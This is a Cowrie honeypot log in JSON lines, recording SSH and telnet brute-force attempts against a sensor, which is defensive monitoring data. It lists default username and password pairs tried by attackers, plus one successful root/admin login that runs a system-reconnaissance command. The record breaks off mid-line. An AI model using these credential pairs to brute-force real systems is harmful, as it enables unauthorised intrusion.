{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:09:22.565005Z","src_ip":"45.125.211.194","session":"0a075c50ac27"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123","message":"login attempt [app/app123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:09:23.389941Z","src_ip":"45.125.211.194","session":"0a075c50ac27"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:09:24.600838Z","src_ip":"45.125.211.194","session":"0a075c50ac27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46091,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5bec793923b","protocol":"ssh","message":"New connection: 212.227.235.229:46091 (1.2.3.4:22) [session: c5bec793923b]","sensor":"my-vps","timestamp":"2025-08-28T03:09:32.998029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:09:32.998956Z","src_ip":"212.227.235.229","session":"c5bec793923b"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:09:33.107848Z","src_ip":"212.227.235.229","session":"c5bec793923b"}
{"eventid":"cowrie.login.failed","username":"apps","password":"apps","message":"login attempt [apps/apps] failed","sensor":"my-vps","timestamp":"2025-08-28T03:09:33.812333Z","src_ip":"212.227.235.229","session":"c5bec793923b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:09:34.902703Z","src_ip":"212.227.235.229","session":"c5bec793923b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":51755,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e4abffb02db","protocol":"ssh","message":"New connection: 45.125.211.194:51755 (1.2.3.4:22) [session: 4e4abffb02db]","sensor":"my-vps","timestamp":"2025-08-28T03:09:37.094496Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:09:37.118833Z","src_ip":"45.125.211.194","session":"4e4abffb02db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:09:37.309002Z","src_ip":"45.125.211.194","session":"4e4abffb02db"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-28T03:09:38.141398Z","src_ip":"45.125.211.194","session":"4e4abffb02db"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:09:39.352643Z","src_ip":"45.125.211.194","session":"4e4abffb02db"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":16557,"dst_ip":"1.2.3.4","dst_port":22,"session":"a86e612fe7ae","protocol":"ssh","message":"New connection: 45.125.211.194:16557 (1.2.3.4:22) [session: a86e612fe7ae]","sensor":"my-vps","timestamp":"2025-08-28T03:09:52.028613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:09:52.041067Z","src_ip":"45.125.211.194","session":"a86e612fe7ae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:09:52.245848Z","src_ip":"45.125.211.194","session":"a86e612fe7ae"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse123","message":"login attempt [lighthouse/lighthouse123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:09:53.077836Z","src_ip":"45.125.211.194","session":"a86e612fe7ae"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:09:54.290618Z","src_ip":"45.125.211.194","session":"a86e612fe7ae"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":13104,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf3a4e8eeb04","protocol":"ssh","message":"New connection: 45.125.211.194:13104 (1.2.3.4:22) [session: cf3a4e8eeb04]","sensor":"my-vps","timestamp":"2025-08-28T03:10:07.010319Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:10:07.037280Z","src_ip":"45.125.211.194","session":"cf3a4e8eeb04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:10:07.222962Z","src_ip":"45.125.211.194","session":"cf3a4e8eeb04"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:10:08.061038Z","src_ip":"45.125.211.194","session":"cf3a4e8eeb04"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:10:09.272059Z","src_ip":"45.125.211.194","session":"cf3a4e8eeb04"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":30902,"dst_ip":"1.2.3.4","dst_port":22,"session":"9051cfdca21f","protocol":"ssh","message":"New connection: 45.125.211.194:30902 (1.2.3.4:22) [session: 9051cfdca21f]","sensor":"my-vps","timestamp":"2025-08-28T03:10:21.890937Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:10:21.902689Z","src_ip":"45.125.211.194","session":"9051cfdca21f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:10:22.101801Z","src_ip":"45.125.211.194","session":"9051cfdca21f"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:10:22.936229Z","src_ip":"45.125.211.194","session":"9051cfdca21f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:10:23.373633Z","src_ip":"45.125.211.194","session":"9051cfdca21f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:10:23.374384Z","src_ip":"45.125.211.194","session":"9051cfdca21f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:10:23.590833Z","src_ip":"45.125.211.194","session":"9051cfdca21f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:10:23.591850Z","src_ip":"45.125.211.194","session":"9051cfdca21f"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":55254,"dst_ip":"1.2.3.4","dst_port":22,"session":"91f97644a5ab","protocol":"ssh","message":"New connection: 194.233.79.134:55254 (1.2.3.4:22) [session: 91f97644a5ab]","sensor":"my-vps","timestamp":"2025-08-28T03:10:27.713429Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:10:27.945650Z","src_ip":"194.233.79.134","session":"91f97644a5ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:10:27.946425Z","src_ip":"194.233.79.134","session":"91f97644a5ab"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:10:30.053387Z","src_ip":"194.233.79.134","session":"91f97644a5ab"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:10:32.176890Z","src_ip":"194.233.79.134","session":"91f97644a5ab"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":51251,"dst_ip":"1.2.3.4","dst_port":22,"session":"5864cc9ee505","protocol":"ssh","message":"New connection: 45.125.211.194:51251 (1.2.3.4:22) [session: 5864cc9ee505]","sensor":"my-vps","timestamp":"2025-08-28T03:10:36.710929Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:10:36.727217Z","src_ip":"45.125.211.194","session":"5864cc9ee505"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:10:36.932915Z","src_ip":"45.125.211.194","session":"5864cc9ee505"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"gpadmin","message":"login attempt [gpadmin/gpadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T03:10:37.760807Z","src_ip":"45.125.211.194","session":"5864cc9ee505"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:10:38.973129Z","src_ip":"45.125.211.194","session":"5864cc9ee505"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46092,"dst_ip":"1.2.3.4","dst_port":22,"session":"272fe0c2b1f6","protocol":"ssh","message":"New connection: 212.227.235.229:46092 (1.2.3.4:22) [session: 272fe0c2b1f6]","sensor":"my-vps","timestamp":"2025-08-28T03:10:46.442431Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:10:46.451201Z","src_ip":"212.227.235.229","session":"272fe0c2b1f6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:10:46.545778Z","src_ip":"212.227.235.229","session":"272fe0c2b1f6"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1qaz@WSX","message":"login attempt [ftpuser/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-28T03:10:46.916255Z","src_ip":"212.227.235.229","session":"272fe0c2b1f6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:10:48.021909Z","src_ip":"212.227.235.229","session":"272fe0c2b1f6"}
{"eventid":"cowrie.session.connect","src_ip":"166.246.56.147","src_port":59296,"dst_ip":"1.2.3.4","dst_port":23,"session":"070e69561b17","protocol":"telnet","message":"New connection: 166.246.56.147:59296 (1.2.3.4:23) [session: 070e69561b17]","sensor":"my-vps","timestamp":"2025-08-28T03:10:48.726213Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":34400,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2788654d247","protocol":"ssh","message":"New connection: 45.125.211.194:34400 (1.2.3.4:22) [session: c2788654d247]","sensor":"my-vps","timestamp":"2025-08-28T03:10:51.530060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:10:51.534195Z","src_ip":"45.125.211.194","session":"c2788654d247"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh